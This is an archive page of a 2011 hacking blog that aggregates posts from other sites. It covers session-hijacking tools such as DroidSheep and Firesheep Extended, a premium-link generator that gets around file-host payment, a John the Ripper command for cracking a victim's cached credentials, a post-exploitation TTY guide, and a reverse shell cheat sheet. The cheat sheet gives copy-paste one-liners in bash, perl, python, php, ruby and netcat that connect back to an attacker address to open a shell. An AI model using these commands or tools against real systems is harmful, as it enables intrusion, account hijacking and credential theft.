Sep 17, 2011

Droidsheep : Android Application for Session Hijacking


Droidsheep is free alternate of faceniff which is available on download droidsheep website for free. Its one click hijacking tool which supports
  • Amazon.de
  • facebook.com
  • flickr.com
  • twitter.com
  • linkdein.com
  • yahoo.com
  • live.com
  • google.de (only the non-encrypted services like "maps")
What do you need to run DroidSheep.?
  • You need an android-powered device, running at least version 2.1 of Android
  • You need Root-Access on your phone (link)
  • You need DroidShep (You can get it in the "GET IT" section)
 If you want to download this app., please go to the Source.
Source: http://thehackernews.com/2011/09/droidsheep-android-application-for.html#.TnOyVR3TA6I.facebook

If you like my blog, Please Donate Me

Sep 15, 2011

List of Rogue Certificate That Was Create In Diginotar Incident.

 After hacker hack Diginotar CA, they create many rogue certificate for Man-In-The-Middle, create phishing website or whatever.


This post will paste the link that list of rogue certificate that was create in this incident.

Please revoke the key or certificate if you added it in the past.

Download Link: https://svn.torproject.org/svn/projects/misc/diginotar/rogue-certs-2011-09-04.csv




If you like my blog, Please Donate Me

IPhone secret codes | iPhone tricks


List of the secret codes is given below


Code                                        Action 



*#06#                         To display the IMEI Number of the mobile  



*225#                         Use to display the balance detail of postpaid number    



*#43#                         Use to verify if call waiting is enabled



*#61#                         Verify the number for unanswered calls



*#62#                         Verify the number for call forwarding if no service is available.



*#67#                         Verify the number for call forwarding if phone is busy



*#646#                        Use to display the minute detail of postpaid number



*777#                         Use to display the balance detail of prepaid number    



*3001#12345#*                 Display the iphone inner settings



*#33#                         To verify whether barring is enabled or disabled for outgoing



*#21#                         To display the settings for your call forwarding


Source:  http://tricksndtricks.blogspot.com/2011/09/iphone-secret-codes-iphone-tricks.html


If you like my blog, Please Donate Me

Link For Download Slide And White Paper From DefCon19

DefCon is one of the oldest continuous running hacker conventions around, and also one of the largest.

Now, Slides of DefCon#19  has ready for download.

Download Link:  https://www.defcon.org/html/links/dc-archives/dc-19-archive.html

If you like my blog, Please Donate Me

FileServe, Filesonic and wupload pemium link generator

FileServe, Filesonic and wupload  are somefamous file hosting website and you need to have a premium account for unlimited and fast download. Today i have an online tool which generates premium links for these 3 filehosting website. I already posted some other tools and online service for hacking and getting premium links of filehosting services. This is a new one which i got online.


Go to these links and enjoy



fileserve:

http://generatory.3xg.pl/fileserve

filesonic:

http://generatory.3xg.pl/filesonic

wupload:

http://generatory.3xg.pl/wupload


Source:  http://www.hackingtricks.in/2011/06/fileserve-filesonic-and-wupload-pemium.html


If you like my blog, Please Donate Me

Sep 12, 2011

Multiple Dictionaries or Wordlists Using John the Ripper

if you want the details, please go to the Source.

John the ripper only takes one word list at a time. There are plenty of docs out there that show you how to cat all of your dictionaries into John's stdin function but I like to run rules against my lists and I didn't see any how-tos on doing this. Here is my way:

ls dicts | xargs -t -I file ./john --pot=victim.pot --format=mscash --wordlist=dicts/file --rules victim_cachedump.txt

Source: http://www.room362.com/blog/2011/9/12/multiple-dictionaries-or-wordlists-using-john-the-ripper.html


If you like my blog, Please Donate Me

Post-Exploitation Without A TTY


Post-exploitation activities during a pentest may involve using “su” to try and log into other local accounts, or using “ssh” to log into other hosts.

Using “Expect” To Get A TTY

If you’re lucky enough to have the Expect language installed just a few lines of code will get you a good enough TTY to run useful tools such as “ssh”, “su” and “login”.

$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
 
The following output taken from a reverse shell demonstrates how “su” doesn’t work until we use the Expect script:

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 48257
sh: no job control in this shell
sh-3.2$ su -
su: must be run from a terminal
sh-3.2$ expect sh.exp
spawn sh
sh-3.2$ su -
Password:  mypassword
localhost ~ #
 
Likewise, the ssh client doesn’t seem to work properly (with or without the -T option):

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 33250
sh: no job control in this shell
sh-3.2$ ssh localhost
Pseudo-terminal will not be allocated because stdin is not a terminal.
<big pause>
$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 33252
sh: no job control in this shell
sh-3.2$ ssh -T localhost
<big pause>
 
After we run sh.exp we are able to use the ssh client as normal:

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43498
sh: no job control in this shell
sh-3.2$ expect sh.exp
spawn sh
sh-3.2$ ssh localhost
ssh localhost
Password: mypassword
Last login: Wed Jan 16 13:43:20 2008 from 127.0.0.1

user@localhost ~ $

Using Python To Get A TTY

This is quite an elegant solution I found on Tero’s glob.  It should be effective against gentoo systems at least because the gentoo package management runs on python.

$ nc -v -n -l -p 1234
listening on [any] 1234 …
sh: no job control in this shell
sh-3.2$ su -
su: must be run from a terminal
sh-3.2$ python -c ‘import pty; pty.spawn(“/bin/sh”)’
sh-3.2$ su -
su -
Password:
localhost ~ #


Source: http://pentestmonkey.net/blog/post-exploitation-without-a-tty


If you like my blog, Please Donate Me

Reverse Shell Cheat Sheet

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port.  This page deals with the former.
Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.
The examples shown are tailored to Unix-like systems.  Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”.
Each of the methods below is aimed to be a one-liner that you can copy/paste.  As such they’re quite short lines, but not very readable.

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
 
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL

Here’s a shorter, feature-free version of the perl-reverse-shell:
 
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

There’s also an alternative PERL revere shell here.

Python

This was tested under Linux / Python 2.7:
 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

This code assumes that the TCP connection uses file descriptor 3.  This worked on my test system.  If it doesn’t work, try 4, 5, 6…
 
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.
 
nc -e /bin/sh 10.0.0.1 1234

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:
 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

xterm

One of the simplest forms of reverse shell is an xterm session.  The following command should be run on the server.  It will try to connect back to you (10.0.0.1) on TCP port 6001.
 
xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001).  One way to do this is with Xnest (to be run on your system):
 
Xnest :1

You’ll need to authorise the target to connect to you (command also run on your host):
 
 xhost +targetip
 
Source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 


If you like my blog, Please Donate Me

Sep 11, 2011

Post Exploitation Command Lists

This post is very interesting article from room362, so please go to the Source.

I've had a private list of commands that I run on Windows or Linux when I pop a shell, as I'm sure most pentesters do. It isn't so much a thing of hoarding as much it is just jumbled notes that are 'not worth posting'
Well, I made two (now 3) public google docs (anyone can edit) *don't be a dick clause
Linux/Unix/BSD Post Exploitation:
https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US
Windows Post Exploitation:
https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US
and newly added OSX Post Exploitation:
https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit?hl=en_US

Source: http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html




If you like my blog, Please Donate Me

Firesheep Extended!

Firesheep is a Firefox extension that demonstrates HTTP session hijacking attacks. You can hijack private accounts on Facebook, Twitter, and other websites that employ weak HTTP protection strategies.

Changes in Firesheep Extended:

This version which has been modified by the Alcatel-Lucent Bell Labs focuses on some Web applications like Google Search only verify the (unsecured) user’s session to render personalization features. Such sessions are hijacked by the tool by simply capturing the corresponding “sid cookie”. It basically shows how the “sid cookie” could be misused by an attacker, providing unauthorized access to the Google Search personalized results and history!
The authors extended Firesheep to implement the HTTP information leakage attack. Thanks to the Firehseep modularity, they could easily add a module that performs the attack on the sessions hijacked by the original code. As a result, when a Google “sid cookie” is captured, the account name appears in the Firesheep sidebar. Double clicking on it starts the attack; double clicking again displays the retrieved list of visited links!
The only solutions possible to avoid this attack were to sign out from Google accounts when connecting from a shared network or to use a VPN to encrypt the traffic and prevent cookie interception.
Now after downloading the extension you might be presented with a prompt that it is not compatible with your version of Firefox. This is because of the following piece of code in install.rdf:
<em:targetApplication>
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id> <!-- Firefox -->
<em:minVersion>3.6.10</em:minVersion>
<em:maxVersion>5.*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
You need to change the “5.*” to “6.*” if you use the latest version of Firefox. You can read the paper that was released with this tool here – http://arxiv.org/pdf/1108.5864v1

If you want to download this addon, please go to the Source.

Source: http://www.pentestit.com/2011/09/10/update-firesheep-extended/ 

If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |